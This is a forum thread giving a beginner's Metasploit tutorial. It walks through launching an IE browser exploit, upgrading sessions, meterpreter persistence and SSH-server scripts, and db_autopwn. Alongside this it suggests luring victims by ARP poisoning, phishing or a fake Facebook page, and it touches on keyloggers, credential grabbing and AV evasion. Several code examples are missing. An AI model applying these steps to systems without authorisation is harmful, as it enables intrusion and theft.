
My Metasploit tutorial thread

For those beginners, much of this stuff can be found in some good resources I will cite later. Please leave comments on things you'd like to see included or corrections that may need to be made. Currently this post is a work in progress.

Common msfconsole tasks:
First, of course, open a terminal and issue the command:

Code:

root@bt:~# msfconsole

Then there are some basics like searching for exploits, getting a more detailed description of a given exploit from within the framework, selecting a payload, running the exploit, some of the simple automation that can be done, and other oddities. Here we will look for exploits that are 2010 Microsoft security advisories.

Code:

search ms10

Next, maybe we want to know more about a given exploit. This information looks similar to what is found in the advisories and maybe even on Exploits Database by Offensive Security, but includes things like the options that can be set.

Code:

info windows/browser/ms10_xxx_ie_css_clip

Now we will load up an exploit we'd like to try.

Code:

use windows/browser/ms10_xxx_ie_css_clip

We need to configure our exploit options for it to work, of course. I like to select payloads first. Not all payloads work with all exploits. To keep things simple, the Metasploit developers have designed the framework so that once you have selected the exploit you would like to use, if you issue the command below (show payloads) the framework will only show the payloads that work for your selected exploit.

Code:

msf exploit(ms10_xxx_ie_css_clip) > show payloads

Remember the info command we used with exploits? Well, it works with payloads too. Take some time to familiarize yourself with the payloads Metasploit has to offer.

The uripath option sets the directory in which the malicious webserver will be located. The root directory keeps it simple. srvport sets the webserver port to 80, also making this vector simpler to perform. Please refer to other documentation for the other options, such as the excellent Metasploit Unleashed Information Security Training.
Here is where you might want to include some automation or set some of the other features. To view the advanced options available, issue the following command:

Code:

show advanced

A couple of interesting advanced options are AutoRunScript and InitialAutoRunScript.
Please refer to section 10 (meterpreter scripting) of the MSF Unleashed course for more information on which scripts are available.
Another way is to issue the following command in your terminal (not in the framework console):

The two AutoRunScript options allow your session to perform scripted tasks as soon as the session begins. Things like making a meterpreter session persistent, beginning a keylogger immediately, migrating your session to another process, or even chaining multiple commands are possible. You'll want to do some studying and experimenting with what automation you find works for you.
Now we need to run our exploit. I like the -j option, as it backgrounds the exploit process so you can continue to work in the framework console.

Code:

exploit -j

Now find a creative way to lure your victim to your malicious website, since the exploit we've selected here is a client-side exploit. You could use ARP poisoning or a phishing-style attack with the link. Be inventive! I am just using a simple, not updated Windows XP SP3 machine running on my LAN in VirtualBox, so I will just browse there myself. In my victim's web browser I simply entered my attacker's IP.

In this case we are using a simple reverse shell and not a meterpreter. The migration error is OK, as migrate is a meterpreter script. In some instances you may only be able to begin with a shell due to payload limitations an exploit has. No problem. Here is what I like to do.

Turning Windows shells into meterpreter sessions the easy way.
First, let's list our sessions. Then we'll take a look at the options the sessions command has, since there is one we like a lot.

That -u option is pretty sweet. Let's go ahead and upgrade our shell to a meterpreter. FYI, it did not work in this instance, possibly because the shell we are using is also a reverse connection. I will edit this thread later with the correct updates. Anyway, the command to upgrade a shell is:

Code:

msf exploit(ms10_xxx_ie_css_clip) > sessions -u 1

EDIT: I didn't get the thread edited with the upgrade working, but I have made a video of using the spoolss exploit with a reverse shell payload, then upgrading that. I've also shown the makerc command and the migrate meterpreter script. Migrate should be covered elsewhere and is a mostly simple concept. To understand when migrate is not simple, watch the megaprimer series.
Makerc is useful as it will generate a Metasploit resource file (akin to a bash script for Metasploit, almost) of all the commands used in that session. Good automation tool. I will show using resource files later on, and they are also covered in the MSF Unleashed course.
m10_061_spoolss demo
...continued....

Re: My Metasploit tutorial thread

Now that we've "upgraded", let's discuss those meterpreter automation scripts briefly again.
To find out what syntax, features and options a script has, you can use the run command, the script name, then the -h option. Here are some examples of a couple of the scripts I find useful:

Code:

meterpreter > run persistence -h
OPTIONS:
-A Automatically start a matching multi/handler to connect to the agent
-S Automatically start the agent on boot as a service (with SYSTEM privileges)
-U Automatically start the agent when the User logs on
-X Automatically start the agent when the system boots
-h This help menu
-i <opt> The interval in seconds between each connection attempt
-p <opt> The port on the remote host where Metasploit is listening
-r <opt> The IP of the system running Metasploit listening for the connect back
meterpreter > run win32-sshserver -h
OpenSSH-server deploy+run script
This script will deploy OpenSSH + run the SSH-server as a service
OPTIONS:
-F Force overwriting of registry-values
-I <opt> Install OpenSSH to the given directory
-N <opt> Set custom service name
-S <opt> Set custom service description
-U <opt> Download OpenSSH-SFX from given URL
-f <opt> The filename of the OpenSSH-SFX to deploy. (Default is to auto-download from meterpreter.illegalguy.hostzi.com
-h This help menu
-m <opt> Do not start the OpenSSH-service after installation
-p <opt> Password for the new user
-r Uninstall OpenSSH + delete added user (ATTENTION: will only uninstall OpenSSH-installations that were deployed by this script!!)
-t <opt> Set start-type of the service to manual (Default: auto)
-u <opt> Add windows-user (autoadded to local administrators

One handy feature is to set environment variables globally. This can be done with setg. Here is an example of setting meterpreter as the payload globally.

Code:

msf exploit(ms10_xxx_ie_css_clip) > unsetg
Usage: unset var1 var2 var3 ...
The unset command is used to unset one or more variables.
To flush all entires, specify 'all' as the variable name
msf exploit(ms10_xxx_ie_css_clip) > unsetg all
Flushing datastore...
msf exploit(ms10_xxx_ie_css_clip) >

A very cool way I've found for using setg for the global variables is with the Social Engineering Toolkit.
Say you want to be quick and dirty, as you have other tasks for this pentest. You've already compromised your client's wireless network using your ninja skills, so you set up a fake Facebook with SET, using a Java attack, ARP poison some of the interesting workstations on said wireless network with dns spoof, and get a meterpreter session. Now, as we said, you also have a lot of other work to do on this particular pentest. Well, you can

And get sessions that you can make sure you will keep, and even grab credentials for all kinds of things, while you're working on your reporting or doing some further research. The global variables I have tried with the Social Engineering Toolkit have allowed me to further tweak its capabilities and automation. Thanks rel1k for such great tools!

I will continue to add things to this thread as I go on.

I will update this thread a little later on with my favorite resource links for Metasploit education.
Hope this thread is useful to some of you, even though there is a lot of redundant metasploit info out there.

And one last thing.... The Metasploit developers recommend updating your Metasploit at least every couple of days. New exploits are released, quite often existing code is improved, or better yet, we are seeing new meterpreter scripts all the time.

This can be done using

Code:

msfupdate

Hope everyone enjoys my post, please leave comments, and let's all take a moment to thank the giants on whose shoulders we stand (BackTrack developers, MSF developers, and other community contributors)!

Re: My Metasploit tutorial thread

The Metasploit class I've referenced on irongeek I actually just found and began watching myself when writing this tut. So far my fav part is Adrian asking, "Ok, so how many people are using metasploit in linux....?" [raising of hands] "And how many people are using msf in windows?" "ok, Just you..."

Seriously though, the framework is generally much smoother in Linux, but sometimes it really is handy to have it in Windows.

From the first video there, one new thing Adrian and Dave brought to my attention was "sessions -l -v". The -v switch shows what exploit was performed to get said session. Here is a scenario that demonstrates how useful that is. We're running db_autopwn against a victim. We get a number of sessions but want to know which exploits were successful.

Bear in mind the IPs used in the above scenario are different from the beginning of the post. Just an isolated subnet for my virtual machines.

Some more commands I don't frequently see used in some of the other resources around.

First, the makerc command is handy for making a resource file from the session you've just run. I'll get some information on using resource files in here also, but there is some information found in the MSF Unleashed course.

Re: My Metasploit tutorial thread

THANK YOU AGAIN AND I WANT TO ADD THIS TUT:
Download videos from securitytube.net
Method 1 :
———
Viewing the source of the page in which the video is being played, and searching for “.mp4”, gets you the actual location of the video. All you have to do is use a download manager to download from that location. I use Firefox, and I used the download manager which came with the addon named “DownThemAll!” for this purpose.

Method 2 :
———
In case you are using Linux, the videos get buffered into the /tmp directory. Mostly, they'll begin with the name “Flash”, followed by a few other numbers and characters. Just copy them to a different location AFTER the video finishes buffering.

Re: My Metasploit tutorial thread

Originally Posted by skull2006

THANK YOU AGAIN AND I WANT TO ADD THIS TUT:
Download videos from securitytube.net
Method 1 :
———
Viewing the source of the page in which the video is being played, and searching for “.mp4”, gets you the actual location of the video. All you have to do is use a download manager to download from that location. I use Firefox, and I used the download manager which came with the addon named “DownThemAll!” for this purpose.

Method 2 :
———
In case you are using Linux, the videos get buffered into the /tmp directory. Mostly, they'll begin with the name “Flash”, followed by a few other numbers and characters. Just copy them to a different location AFTER the video finishes buffering.

Hope this helps!!! ;-)

Appreciate the tip! There are a lot of video references and they do take some time to watch, so downloading them can be handy. My co-worker likes to download them onto his Xbox media center so he can use his epic-size projector.

I like to use Ant Video Downloader with embedded FLV Player,
which is a Firefox plugin, with a player included so you don't need to go searching for where the heck it put those FLV files (because where it does is somewhat of a long path sometimes).

Re: My Metasploit tutorial thread

Originally Posted by iproute

Appreciate the tip! There are a lot of video references and they do take some time to watch, so downloading them can be handy. My co-worker likes to download them onto his Xbox media center so he can use his epic-size projector.

I like to use Ant Video Downloader with embedded FLV Player,
which is a Firefox plugin, with a player included so you don't need to go searching for where the heck it put those FLV files (because where it does is somewhat of a long path sometimes).

Thank you for that too..........
And what about other SBH if the victim has AV, firewall, patched?
Maybe you can give us an idea for that?

Re: My Metasploit tutorial thread

And what about other SBH if the victim has AV, firewall, patched?
Maybe you can give us an idea for that?

I'll give some info on my take on it in another post when I've got more time, but I'm definitely not an expert. Might be good to get in touch with vivek and find out if there are any further presentations planned. From elsewhere on the internet it looks like he is pretty good about responding.

Re: My Metasploit tutorial thread

I've decided to add a section on using db_autopwn, just to add to completeness and content. Please spend some time with the resources I've included in the links section as well. db_autopwn is a very handy tool to get some work done quickly; however, using exploits individually can often be more effective as well as quieter/stealthier. Also, please configure your PostgreSQL database, as many of us have pointed out quite a number of times that sqlite3 has issues or is not as reliable as postgres for using db_autopwn. Visit sickn3ss' thread listed in the links section for information on configuring PostgreSQL for this use.
Below is setting the driver, and confirming it is set to what you need.

This is what will be output if you have not yet used postgres for this (i.e. have not created the database; in this case we are creating the database 'db_autopwn').
Anyway, here is the command to connect:

Next, I like to verify the status of the connection. If you are not creating a new database and are connecting to an existing one, it may be a good idea to see if you've left anything in it. Here's the example:

In the example above, there is nothing in the database. Entries can be added or otherwise manipulated manually with commands such as db_add_host, db_add_port, db_del_host, etc. Of course, nmap is a much simpler way of populating your database. Right now we are just going to add an individual host with db_nmap, but you can certainly scan in a subnet instead.